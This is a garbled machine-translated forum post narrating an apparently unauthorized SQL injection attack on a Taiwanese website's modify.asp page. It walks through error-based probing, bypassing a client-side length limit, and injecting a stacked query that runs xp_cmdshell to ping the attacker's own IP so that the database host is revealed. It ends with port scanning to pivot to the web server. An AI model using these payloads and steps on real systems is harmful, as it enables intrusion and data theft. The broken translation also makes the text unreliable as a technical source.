Very long has not invaded, the hand a little itches, strolled several TW websites to want casually to look for value an a little the website to play, therefore has found this website.

Routine, place has filled in single quotes in “the registration account number”, returned to the following information:

SQL Server Microsoft OLE DB tenderer (0x80040E14)

Omission character string of character ' ' ' Front quotation mark.

/rdshow/modify.asp, line 5

Looks like is the existence pours into the crack, how has a look at the jurisdiction. Continues in the debarkation mouth input ' and user>0 and `'= ', the question appeared: Is unable to input completely. Looked like the homepage to input the length to make the limit, this difficult not to me. The preserved homepage, changes the homepage source code two places, is Action=modify.asp changes Action=

[url= http://www.xxx.org.tw/rdshow/modify.asp] http://www.xxx.org.tw/rdshow/modify.asp [/url]

, but also some are changes in a big way the input character length, is also maxlength=10 changes 100, then might not limit inputs casually. After a moment ago code complete input, obtains the following information:

SQL Server Microsoft OLE DB tenderer (0x80040E07)

Nvarchar value ' dbo' Transforms the data variant is the int data line grammatical error.

/rdshow/modify.asp, line 5

Looks like possible, but poured into like this is too troublesome. Has a look at the homepage again the source code, if pours into the crack to transform URL the form, like this poured into facilitates are many. After simultaneously transforms, also some very good merit, is may use NBSI and so on pours into the tool, simplified us to pour into the process greatly. After transformed URL is

[url= http://www.xxx.org.tw/rdshow/] http://www.xxx.org.tw/rdshow/ [/url]

 modify.asp? bidno=f ** k. Now WEB and the SQL main engine separated situation are many, first we first have a look at the database the IP address. Turns on the day network, then in the IE submission:

[url= http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k '; exec] http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k '; exec[/url]

 master.dbo.xp_shell' ping myip'; --

Sees the database from the day network's warning diary the IP address is 210.208.xxx.253, again Ping

[url= http://www.xxx.org.tw] www.xxx.org.tw [/url]

, obtains the IP address is actually 210.208.xxx.32, looks like the database and the WEB server is not the identical Taiwan main engine, but looking from the IP distribution, these two main engines is in the identical webpage, so long as under theoretically we can attack and occupy the database main engine, must seep to the WEB server is not the difficult matter (afterward proved truly so). To this step, used Superscan to scan the database main engine first to operate any port.

Small prompt: The advantage which scans to the database server has many first, for instance may survey opposite party whether to have operated the firewall, whether to have FTP or the WEB service, like this can determine how next step should pour into.